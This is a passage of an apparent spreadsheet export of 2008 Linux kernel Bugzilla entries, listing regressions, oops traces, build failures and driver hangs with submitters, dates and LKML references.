[574125.004558] [&lt;c0110421&gt;] do_page_fault+0x467/0x546 [574125.009575] [&lt;c02f2d8a&gt;] error_code+0x72/0x78 [574125.014159] [&lt;c015ed6b&gt;] vfs_readdir+0x5d/0x89 [574125.018828] [&lt;c015edf5&gt;] sys_getdents64+0x5e/0xa0 [574125.023759] [&lt;c010264e&gt;] sysenter_past_esp+0x5f/0x85 [574125.028948] ======================= [574125.032630] Code: 7f 31 f6 89 1c 24 89 74 24 04 8b 45 c0 ff 55 bc 85 c0 0f 85 9f 00 00 00 8b 4f 10 83 c1 1f 83 e1 f8 31 d2 29 4d d0 19 55 d4 01 cf &lt;8b&gt; 47 08 8b 57 0c 89 45 d8 89 55 dc 83 7d d4 00 7f a1 7c 06 83 [574125.053259] EIP: [&lt;c01d7154&gt;] xfs_file_readdir+0xea/0x199 SS:ESP 0068:d26f1f10 [574125.060956] ---[ end trace 140cd0f5f61f796f ]--- [600377.481204] a.out[8789]: segfault at 00000062 eip b7d5457b esp bfbaf318 error 4 piii config: http://sysadminday.org.ru/2.6.24.2/2.6.24.2-p3_config p4 config: http://sysadminday.org.ru/2.6.24.2/2.6.24.2-p4_config p3 bug (full): http://sysadminday.org.ru/2.6.24.2/2.6.24.2-p3_xfs_file_readdir.bug p4 bug (short): http://sysadminday.org.ru/2.6.24.2/2.6.24.2-p4_xfs_file_readdir.bug Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.25-rc2 regression - hang on suspend</t>
  </si>
  <si>
    <t>2008-02-22 07:54 UTC</t>
  </si>
  <si>
    <t>2008-03-25 04:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2 regression - hang on suspend Submitter : Soeren Sonnenburg &lt;kernel@nn7.de&gt; Date : 2008-02-19 12:59 References : http://lkml.org/lkml/2008/2/19/165 Handled-By : Patch : This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>TUNER_TDA8290=y, VIDEO_DEV=n build error</t>
  </si>
  <si>
    <t>2008-02-22 10:36 UTC</t>
  </si>
  <si>
    <t>2008-04-07 04:54 UTC</t>
  </si>
  <si>
    <t>Subject : TUNER_TDA8290=y, VIDEO_DEV=n build error Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; References : http://lkml.org/lkml/2008/2/19/262 Caused-By : Michael Krufky &lt;mkrufky@linuxtv.org&gt; commit 746d9732dbd5b95c3ba36230e2814fa2c391a311 commit 5bea1cd3871351d70cc7624af138f8aa68b7be77</t>
  </si>
  <si>
    <t>Jarek Poplawski</t>
  </si>
  <si>
    <t>Recent driver in linux kernel 2.6.25-rc2</t>
  </si>
  <si>
    <t>2008-02-23 12:36 UTC</t>
  </si>
  <si>
    <t>2008-02-26 08:30 UTC</t>
  </si>
  <si>
    <t>Subject : Recent driver in linux kernel 2.6.25-rc2 Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-02-19 16:39 References : http://lkml.org/lkml/2008/2/19/248 Handled-By : "Chatre, Reinette" &lt;reinette.chatre@intel.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression: CD burning (k3b) went broke</t>
  </si>
  <si>
    <t>commit 9a4c854..5d9c4a7</t>
  </si>
  <si>
    <t>2008-02-23 12:48 UTC</t>
  </si>
  <si>
    <t>2008-03-04 15:45 UTC</t>
  </si>
  <si>
    <t>Subject : regression: CD burning (k3b) went broke Submitter : Mike Galbraith &lt;efault@gmx.de&gt; Date : 2008-02-21 09:42 References : http://lkml.org/lkml/2008/2/21/41 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>nozomi (driver for Qualcomm 3G PCMCIA adapter) crashes</t>
  </si>
  <si>
    <t>2.6.25-rc2-git6</t>
  </si>
  <si>
    <t>2008-04-19 15:22 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version: 2.6.23 with gregkh patches Distribution: Gentoo Linux Hardware Environment: Option N.V. Qualcomm MSM6275 UMTS chip [1931:000c] Problem Description: When I boot my system with the Option card inserted I get the following in my syslog: pccard: CardBus card inserted into slot 0 Initializing Nozomi driver 2.1d (build date: Feb 22 2008 21:34:48) nozomi 0000:03:00.0: Init, new card found nozomi 0000:03:00.0: Card type is: 2048 PCI: Enabling device 0000:03:00.0 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 ------------[ cut here ]------------ WARNING: at arch/x86/mm/ioremap.c:137 __ioremap+0x1c2/0x1e3() Modules linked in: nozomi(+) evdev isofs zlib_inflate loop yenta_socket rsrc_nonstatic pcmcia pcmcia_core firewire_ohci firewire_core crc_itu_t arc4 ecb ohci1394 ieee1394 snd_hda_intel snd_pcm snd_timer snd soundcore sdhci snd_page_alloc mmc_core tifm_7xx1 hci_usb tifm_core iwl3945 mac80211 bluetooth cfg80211 tpm_infineon tpm tpm_bios tg3 sg psmouse Pid: 3480, comm: modprobe Not tainted 2.6.25-rc2-git6 #1 [&lt;c01249ea&gt;] warn_on_slowpath+0x4e/0x5e [&lt;c0258d1d&gt;] ? acpi_pci_allocate_irq+0x65/0x6f [&lt;c012a282&gt;] ? __request_region+0x6a/0xa0 [&lt;c021f549&gt;] ? pci_request_region+0x81/0x21a [&lt;c0116619&gt;] __ioremap+0x1c2/0x1e3 [&lt;c021f82d&gt;] ? pci_request_selected_regions+0x32/0x67 [&lt;c0116653&gt;] ioremap_nocache+0xa/0xc [&lt;f8eb5023&gt;] nozomi_card_init+0x209/0x642 [nozomi] [&lt;c0180f8b&gt;] ? find_inode+0x3a/0x64 [&lt;c01acbc0&gt;] ? sysfs_ilookup_test+0x0/0x11 [&lt;c01acbc0&gt;] ? sysfs_ilookup_test+0x0/0x11 [&lt;c0181076&gt;] ? ifind+0x2a/0x88 [&lt;c01acbc0&gt;] ? sysfs_ilookup_test+0x0/0x11 [&lt;c01ad12d&gt;] ? sysfs_addrm_finish+0x16/0x1b8 [&lt;c01aced1&gt;] ? sysfs_add_one+0x3e/0x8f [&lt;c01acf6d&gt;] ? sysfs_addrm_start+0x4b/0x87 [&lt;c022155a&gt;] ? pci_match_device+0xa1/0xa9 [&lt;c0221622&gt;] pci_device_probe+0x44/0x5f [&lt;c0282c04&gt;] driver_probe_device+0x81/0x157 [&lt;c0282e0d&gt;] __driver_attach+0x8c/0x8e [&lt;c02820f8&gt;] bus_for_each_dev+0x41/0x5f [&lt;c0282ab3&gt;] driver_attach+0x19/0x1b [&lt;c0282d81&gt;] ? __driver_attach+0x0/0x8e [&lt;c028297a&gt;] bus_add_driver+0x1a5/0x20b [&lt;c022158d&gt;] ? pci_device_remove+0x0/0x3a [&lt;c0282f9f&gt;] driver_register+0x3d/0xe9 [&lt;c01720d3&gt;] ? cdev_add+0x31/0x33 [&lt;c0374b42&gt;] ? mutex_lock+0xe/0x20 [&lt;c0171f8c&gt;] ? exact_lock+0x0/0x11 [&lt;c0221800&gt;] __pci_register_driver+0x35/0x65 [&lt;f8d160e2&gt;] nozomi_init+0xe2/0x100 [nozomi] [&lt;c014493c&gt;] sys_init_module+0x119/0x1bef [&lt;c0280b0c&gt;] ? device_remove_file+0x0/0x11 [&lt;c016fba2&gt;] ? rw_verify_area+0x5a/0xb9 [&lt;c0170748&gt;] ? sys_read+0x3d/0x64 [&lt;c0103f1a&gt;] sysenter_past_esp+0x5f/0x85 ======================= ---[ end trace f44e4108df509696 ]--- I also tried removing the module (modprobe -r), loading it again (with the card still inserted) and then running a perl script that sends some data to the /dev/noz0 port. Here's what I get in my kernel log then: Unloading Nozomi driver pccard: CardBus card inserted into slot 0 Initializing Nozomi driver 2.1d (build date: Feb 22 2008 21:34:48) nozomi 0000:03:00.0: Init, new card found nozomi 0000:03:00.0: Card type is: 2048 PCI: Enabling device 0000:03:00.0 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 BUG: unable to handle kernel NULL pointer dereference at 00000008 IP: [&lt;f8eb3c1b&gt;] :nozomi:ntty_write_room+0x5a/0x6e *pdpt = 0000000030c8e001 *pde = 0000000000000000 Oops: 0000 [#1] SMP Modules linked in: nozomi sit tunnel4 aes_i586 aes_generic tun ipv6 bridge llc snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss snd_indigoio fuse evdev isofs zlib_inflate loop yenta_socket rsrc_nonstatic pcmcia pcmcia_core firewire_ohci firewire_core crc_itu_t arc4 ecb ohci1394 ieee1394 snd_hda_intel snd_pcm snd_timer snd soundcore sdhci snd_page_alloc mmc_core tifm_7xx1 hci_usb tifm_core iwl3945 mac80211 bluetooth cfg80211 tpm_infineon tpm tpm_bios tg3 sg psmouse [last unloaded: nozomi] Pid: 13425, comm: perl Not tainted (2.6.25-rc2-git6 #1) EIP: 0060:[&lt;f8eb3c1b&gt;] EFLAGS: 00010202 CPU: 0 EIP is at ntty_write_room+0x5a/0x6e [nozomi] EAX: 00000000 EBX: f287d060 ECX: 00000000 EDX: 00000001 ESI: 00000000 EDI: f287d09c EBP: f1bf8efc ESP: f1bf8ef0 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process perl (pid: 13425, ti=f1bf8000 task=f1c74e00 task.ti=f1bf8000) Stack: 0000000f 0000000f f1c33000 f1bf8f38 c026c0e5 f1c33c00 f2358840 f1c33130 f1c33c00 f1bf8f38 00000000 f1c74e00 c011d086 f1c33134 f1c33134 0000000f f1c33000 f2358840 f1bf8f6c c0269ac7 0000000f 0000000f 08872980 c026bfeb Call Trace: [&lt;c026c0e5&gt;] ? write_chan+0xfa/0x304 [&lt;c011d086&gt;] ? default_wake_function+0x0/0xd [&lt;c0269ac7&gt;] ? tty_write+0x11c/0x1a7 [&lt;c026bfeb&gt;] ? write_chan+0x0/0x304 [&lt;c01701c2&gt;] ? vfs_write+0x8b/0x11f [&lt;c02699ab&gt;] ? tty_write+0x0/0x1a7 [&lt;c01707ac&gt;] ? sys_write+0x3d/0x64 [&lt;c0103f1a&gt;] ? sysenter_past_esp+0x5f/0x85 [&lt;c0370000&gt;] ? init_centaur+0x1a9/0x2e9 ======================= Code: f5 0e 4c c7 85 c0 74 17 31 f6 8b 43 38 85 c0 75 17 89 f8 e8 d2 0e 4c c7 89 f0 5b 5e 5f 5d c3 31 f6 89 f0 5b 5e 5f 5d c3 8b 43 08 &lt;8b&gt; 50 08 2b 50 0c 8b 70 04 29 d6 89 f8 e8 ad 0e 4c c7 eb d9 55 EIP: [&lt;f8eb3c1b&gt;] ntty_write_room+0x5a/0x6e [nozomi] SS:ESP 0068:f1bf8ef0 ---[ end trace f44e4108df509696 ]---</t>
  </si>
  <si>
    <t>USB OOPS 2.6.25-rc2-git1</t>
  </si>
  <si>
    <t>2.6.25-rc2-git1</t>
  </si>
  <si>
    <t>2008-02-23 13:55 UTC</t>
  </si>
  <si>
    <t>2008-03-10 18:57 UTC</t>
  </si>
  <si>
    <t>Subject : USB OOPS 2.6.25-rc2-git1 Submitter : Andre Tomt &lt;andre@tomt.net&gt; Date : 2008-02-19 16:19 References : http://lkml.org/lkml/2008/2/19/253 Handled-By : David Brownell &lt;david-b@pacbell.net&gt; Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline</t>
  </si>
  <si>
    <t>2.6.25-rc[1,2]: failed to setup dm-crypt key mapping</t>
  </si>
  <si>
    <t>2008-02-23 14:06 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc[1,2]: failed to setup dm-crypt key mapping Submitter : "Michael S. Tsirkin" &lt;m.s.tsirkin@gmail.com&gt; Date : 2008-02-20 08:43 References : http://lkml.org/lkml/2008/2/20/131 Handled-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Patch : http://lkml.org/lkml/2008/2/22/127 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc2: ohci1394 problem (MMIO broken)</t>
  </si>
  <si>
    <t>2008-02-23 14:10 UTC</t>
  </si>
  <si>
    <t>2008-03-27 14:17 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2: ohci1394 problem Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2008-02-20 08:47 References : http://lkml.org/lkml/2008/2/20/58 Handled-By : Stefan Richter &lt;stefanr@s5r6.in-berlin.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>build #365 issue for v2.6.25-rc2-342-g5d9c4a7 in ./arch/x86/kvm/kvm.ko</t>
  </si>
  <si>
    <t>2.6.25-rc2-342-g5d9c4a7</t>
  </si>
  <si>
    <t>2008-02-23 14:16 UTC</t>
  </si>
  <si>
    <t>2008-03-09 17:41 UTC</t>
  </si>
  <si>
    <t>Subject : build #365 issue for v2.6.25-rc2-342-g5d9c4a7 in ./arch/x86/kvm/kvm.ko Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-02-20 14:11 References : http://lkml.org/lkml/2008/2/20/167 Handled-By : Avi Kivity &lt;avi@qumranet.com&gt; Patch : http://lkml.org/lkml/2008/2/20/195 Handled-By : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Patch : http://lkml.org/lkml/2008/2/20/379 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline</t>
  </si>
  <si>
    <t>2.6.25-rc2-git4 - Kernel oops  while running kernbench and tbench on powerpc</t>
  </si>
  <si>
    <t>2.6.25-rc2-git4</t>
  </si>
  <si>
    <t>2008-02-23 14:20 UTC</t>
  </si>
  <si>
    <t>2008-06-01 19:09 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.25-rc2-git4 - Regression Kernel oops while running kernbench and tbench on powerpc Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; Date : 2008-02-20 16:01 References : http://lkml.org/lkml/2008/2/20/218 References : http://lkml.org/lkml/2008/1/18/71 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG?: "Cannot map mmconfig aperture"</t>
  </si>
  <si>
    <t>commit c31c7d4844ea4817692ae16bf70f9c96c05a50eb</t>
  </si>
  <si>
    <t>2008-02-23 14:24 UTC</t>
  </si>
  <si>
    <t>2008-03-04 07:58 UTC</t>
  </si>
  <si>
    <t>Subject : BUG?: "Cannot map mmconfig aperture" Submitter : Diego Calleja &lt;diegocg@gmail.com&gt; Date : 2008-02-20 22:31 References : http://lkml.org/lkml/2008/2/20/551 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc2 + smartd = hang</t>
  </si>
  <si>
    <t>2008-02-23 14:41 UTC</t>
  </si>
  <si>
    <t>2008-03-31 23:26 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2 + smartd = hang Submitter : Anders Eriksson &lt;aeriksson@fastmail.fm&gt; Date : 2008-02-22 17:51 References : http://lkml.org/lkml/2008/2/22/239 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fix drivers/usb/host/u132-hcd.c compilation</t>
  </si>
  <si>
    <t>2008-02-23 19:49 UTC</t>
  </si>
  <si>
    <t>2008-02-24 04:59 UTC</t>
  </si>
  <si>
    <t>Subject : fix drivers/usb/host/u132-hcd.c compilation Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/23/403 Caused-By : Rafael J. Wysocki &lt;rjw@sisk.pl&gt; commit 3a2d5b700132f35401f1d9e22fe3c2cab02c2549 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/23/403</t>
  </si>
  <si>
    <t>gcc warning shows incorrect handling</t>
  </si>
  <si>
    <t>2008-02-24 14:34 UTC</t>
  </si>
  <si>
    <t>2008-06-01 19:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unsure code has been committed in 2005 Earliest failing kernel version: Distribution: Hardware Environment:Lenovo T61 Software Environment: Problem Description: gcc-4.3 gives me this warning: fs/nfs/callback_xdr.c: In function ‘nfs4_callback_compound’: fs/nfs/callback_xdr.c:404: warning: ‘hdr_arg.taglen’ may be used uninitialized in this function fs/nfs/callback_xdr.c:404: warning: ‘hdr_arg.tag’ may be used uninitialized in this function fs/nfs/callback_xdr.c:404: warning: ‘hdr_arg.nops’ may be used uninitialized in this function which shows that check for status of decode_compound_hdr_arg is missing and some random data might be processed afterwards ?? Steps to reproduce: compile kernel</t>
  </si>
  <si>
    <t>[BUG] 2.6.25-rc2-git8 fails to boot on 486 due to TSC breakage</t>
  </si>
  <si>
    <t>2.6.25-rc2-git8</t>
  </si>
  <si>
    <t>2008-02-24 17:24 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:40 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.25-rc2-git8 fails to boot on 486 due to TSC breakage Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-02-24 References : http://lkml.org/lkml/2008/2/24/50 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Patch : http://lkml.org/lkml/2008/2/24/153 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-current-git blocks for 10-15 secs on boot unless CONFIG_CPU_IDLE=n - Apple</t>
  </si>
  <si>
    <t>2.6.25-rc</t>
  </si>
  <si>
    <t>2008-02-24 17:30 UTC</t>
  </si>
  <si>
    <t>2008-04-10 15:46 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-current-git hangs on boot Submitter : Soeren Sonnenburg &lt;kernel@nn7.de&gt; Date : 2008-02-23 18:55 References : http://lkml.org/lkml/2008/2/23/263 References : http://marc.info/?l=linux-acpi&amp;m=120387537018467&amp;w=4 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc3</t>
  </si>
  <si>
    <t>Can't search for REOPENED</t>
  </si>
  <si>
    <t>foobar</t>
  </si>
  <si>
    <t>2008-02-25 11:49 UTC</t>
  </si>
  <si>
    <t>2008-02-25 12:42 UTC</t>
  </si>
  <si>
    <t>The search form has no way to include REOPENED bugs. I can manually add bug_status=REOPENED to the search url, but that is lost when editing the search.</t>
  </si>
  <si>
    <t>208c70a45624400fafd7511b96bc426bf01f8f5e breaks EC init</t>
  </si>
  <si>
    <t>2008-02-25 13:14 UTC</t>
  </si>
  <si>
    <t>2008-10-17 14:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc2 Earliest failing kernel version:2.6.25-rc3 Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.25-rc2 Regression Thinkpad acpi</t>
  </si>
  <si>
    <t>2.6.25-rc2-git7</t>
  </si>
  <si>
    <t>2008-02-25 14:52 UTC</t>
  </si>
  <si>
    <t>2008-03-10 21:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc2 Regression Thinkpad acpi Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-02-25 12:47 References : http://lkml.org/lkml/2008/2/25/73 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>new regression in 2.6.25-rc3: can't resume from suspend to ram, ata1 errors</t>
  </si>
  <si>
    <t>2008-02-25 15:00 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:44 UTC</t>
  </si>
  <si>
    <t>Subject : new regression in 2.6.25-rc3: can't resume from suspend to ram, ata1 errors Submitter : "Michael S. Tsirkin" &lt;m.s.tsirkin@gmail.com&gt; Date : 2008-02-25 21:57 References : http://lkml.org/lkml/2008/2/25/334 Handled-By : Jeff Garzik &lt;jeff@garzik.org&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc3: WARNING: at arch/x86/mm/ioremap.c:137</t>
  </si>
  <si>
    <t>2008-02-25 15:31 UTC</t>
  </si>
  <si>
    <t>2008-03-11 14:24 UTC</t>
  </si>
  <si>
    <t>10072 10204</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc3: WARNING: at arch/x86/mm/ioremap.c:137 Submitter : Phil Oester &lt;kernel@linuxace.com&gt; Date : 2008-02-25 03:09 References : http://lkml.org/lkml/2008/2/24/265 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG + PATCH/Bugfix] x86/lguest: fix pgdir pmd index calculation</t>
  </si>
  <si>
    <t>commit 37cc8d7f963ba2deec29c9b68716944516a3244f</t>
  </si>
  <si>
    <t>2008-02-25 15:36 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:47 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG + PATCH/Bugfix] x86/lguest: fix pgdir pmd index calculation Submitter : "Ahmed S. Darwish" &lt;darwish.07@gmail.com&gt; Date : 2008-02-24 19:24 References : http://lkml.org/lkml/2008/2/24/136 Handled-By : "Ahmed S. Darwish" &lt;darwish.07@gmail.com&gt; Patch : http://lkml.org/lkml/2008/2/24/136 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>filesystem corruption on xfs after 2.6.25-rc1 (bisected, powerpc related?)</t>
  </si>
  <si>
    <t>commit a69b176df246d59626e6a9c640b44c0921fa4566</t>
  </si>
  <si>
    <t>2008-02-25 15:41 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:52 UTC</t>
  </si>
  <si>
    <t>Subject : filesystem corruption on xfs after 2.6.25-rc1 (bisected, powerpc related?) Submitter : Gaudenz Steinlin &lt;gaudenz@soziologie.ch&gt; Date : 2008-02-25 12:23 References : http://lkml.org/lkml/2008/2/25/123 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] 2.6.25-rc3 hangs in early boot on Sun Ultra5</t>
  </si>
  <si>
    <t>2008-02-25 15:47 UTC</t>
  </si>
  <si>
    <t>2008-03-02 17:57 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.25-rc3 hangs in early boot on Sun Ultra5 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-02-25 21:41 References : http://lkml.org/lkml/2008/2/25/321 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ftruncate in fat can eat all memory and trigger oom killer</t>
  </si>
  <si>
    <t>2008-02-25 15:49 UTC</t>
  </si>
  <si>
    <t>Jiri Palecek</t>
  </si>
  <si>
    <t>2013-03-07 02:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Lenny Hardware Environment: Athlon XP 1800+, 512MB RAM Problem Description: When I tried to download a 700 MB file with ktorrent to an USB stick with FAT filesystem, when ktorrent was "preallocating space", the system became unstable, swapped and then hang. After I've pulled the stick out, I've found out there was oom condition. Ktorrent does this "preallocating" with the ftruncate syscall. Note that the flash is quite slow. This might be a bug in memory management, I'm not sure.</t>
  </si>
  <si>
    <t>r8169 hangs after some use with WoL enabled and "PME Event Wake up" enabled</t>
  </si>
  <si>
    <t>2.6.34</t>
  </si>
  <si>
    <t>2008-02-25 20:19 UTC</t>
  </si>
  <si>
    <t>elsabi</t>
  </si>
  <si>
    <t>2012-05-17 15:36 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Ubuntu Gutsy 2.6.22 Earliest failing kernel version: Distribution: Ubuntu Gutsy, with a self-build 2.6.24 kenel Hardware Environment: CPU: AMD Athlon 64 X2 Mother: Gigabyte GA-MA69VM-S2, BIOS update to version 7. Net Card: (onboard) Realtek Semiconductor Co., Ltd. RTL-8110SC/8169SC Gigabit Ethernet [10ec:8167] (rev 10) Software Environment: Xubuntu Gutsy. Problem Description: After some time using the network this message appears in dmesg: [ 818.483753] NETDEV WATCHDOG: eth0: transmit timed out [ 818.755844] r8169: eth0: link up After that, the network doesn't work anymore. The link LED is on, but it doesn't blink when you send a packet. Also, you can't receive any packet. The network card (which is a 1000Mbps card) is connected to a 10Mbps HUB (yes, I use it for slow internet access). When I run ethtool before it hangs, I can see it in 10Mbps/Half duplex mode. After it hangs (it is, after the "transmit timed out" message), ethtool reports that the card is in 1000Mbps/Full duplex mode. This probably causes the connectivity loss. But, I'm not able to change that speed using ethtool (it simply doesn't change when it run ethtool -s ...). Bringing down and up the interface doesn't solves the problem. Worse than that, when I bring down the interface and then remove the module r8169, it removes fine, but when I try to insert it again with "modprobe r8169", the process ends with a "Killed" message. Then, in dmesg we can see "Unable to handle kernel NULL pointer dereference ..." and the backtrace. At that point, lsmod list the module as inserted, but still doest work. Even worse (if it could be even more worse), when I shutdown the PC and start it again, the machine doesn't boot anymore. It doesn't matter if you unplug it from the wall for some time and plug it again, the machine doesn't boot. It just hangs with the screen off, and before the initial "beep". Some times, when it doesn't boot, a sequence of a long beep and two short beeps could be heard (but I'm not sure if that's the sequence). That sequence could be "CMOS setting error" or "Monitor or video card error". Anyway, the only thing that brings the machine on is make a Clear CMOS (whit the jumper on the motherboard) and reboot it again. I did reproduce this behavior about four times. The failsafe settings in the BIOS has the "PME Event Wake up" feature disabled. I did use the machine for 5 days with that feature disabled and it work well, with no hangs in many hours. Nevertheless, if I enable that feature, the driver will hang after about one hour of use, or with a high traffic over the card. I'm not sure on what exactly causes the timeout, but it seems to be the traffic. I was confused with the relation between the CMOS memory and the Network driver. So I've cehck the battery voltage, power supply voltages, mem test, and the usual things. But it seems that the PME Event wake up could be key of that relation. Also, the machine doesn't boot with etherwake from other machine. I can reproduce the same behavior with and without the CONFIG_R8169_NAPI. Steps to reproduce: Enable "PME Event Wake up" in the BIOS. Use the network some time, and make some heavy traffic. It will hang.</t>
  </si>
  <si>
    <t>Kernel headers error</t>
  </si>
  <si>
    <t>2.6.24.3</t>
  </si>
  <si>
    <t>2008-02-26 01:27 UTC</t>
  </si>
  <si>
    <t>simone nanni</t>
  </si>
  <si>
    <t>2008-05-15 14:19 UTC</t>
  </si>
  <si>
    <t>if_addrlabel.h</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.2 Earliest failing kernel version: 2.6.24.2 Distribution: Slamd 64 Hardware Environment: 2 Opteron 850, 4GB RAM, 72GB SCSI HDD RAID1 Software Environment: Postfix, MySQL 5.0.51a, Apache 2.2.8, PHP 5.2.5, Courier-IMAP Problem Description: make[3]: *** No rule to make target `/usr/src/linux-2.6.24.3/include/linux/if_addrlabel.h', needed by `/usr/src/linux-2.6.24.3/usr/include/linux/if_addrlabel.h'. Stop. make[2]: *** [linux] Error 2 make[1]: *** [headers_install] Error 2 make: *** [vmlinux] Error 2 Steps to reproduce:</t>
  </si>
  <si>
    <t>MacBookPro1,1 hangs on boot (pci=nommconf helps)</t>
  </si>
  <si>
    <t>2008-02-26 16:10 UTC</t>
  </si>
  <si>
    <t>2008-05-21 05:49 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-current-git hangs on boot Submitter : Soeren Sonnenburg &lt;kernel@nn7.de&gt; Date : 2008-02-23 18:55 References : http://lkml.org/lkml/2008/2/23/263 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline. Note: This issue seems to be independent of bug #10093.</t>
  </si>
  <si>
    <t>__you_cannot_kmalloc_that_much in hiddev.c with gcc 3.2</t>
  </si>
  <si>
    <t>2008-02-27 06:57 UTC</t>
  </si>
  <si>
    <t>Alexander</t>
  </si>
  <si>
    <t>2008-04-23 02:43 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.1 Earliest failing kernel version: 2.6.24 Problem Description: Kernel compile finish with error: GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `hiddev_ioctl': hiddev.c:(.text+0xfcc43): undefined reference to `__you_cannot_kmalloc_that_much' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: gcc (GCC) 3.2 20020903 (Red Hat Linux 8.0 3.2-7) USB_HID=y in .config</t>
  </si>
  <si>
    <t>FIXED_PHY must depend on PHYLIB=y</t>
  </si>
  <si>
    <t>2.6.25-rc3-git</t>
  </si>
  <si>
    <t>2008-02-27 07:14 UTC</t>
  </si>
  <si>
    <t>2008-03-13 14:01 UTC</t>
  </si>
  <si>
